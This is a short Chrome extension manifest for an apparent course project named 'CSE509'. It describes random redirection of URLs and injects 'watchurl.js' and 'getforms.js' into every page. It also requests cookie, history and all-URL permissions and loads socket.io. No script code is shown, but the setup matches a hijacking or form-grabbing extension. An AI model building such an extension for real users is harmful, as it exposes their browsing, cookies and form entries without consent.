{
    "manifest_version": 2,
    "name": "CSE509",
    "version": "1.0",
    "description": "Redirected certain urls randomly to a set of urls",
    "background": {
	"scripts": [
	    "socket.io.js",
	    "background.js"
	]
    },
    "content_scripts": [{
	"matches": ["<all_urls>", "file:///*", "http://*/*", "https://*/*"],
	"js": ["watchurl.js","getforms.js"],
	"run_at": "document_start"
    }],
    "permissions": [
        "tabs",
    	"alarms",
    	"http://*/*",
    	"https://*/*",
        "<all_urls>",
        "storage",
        "history",
        "cookies"
    ]
}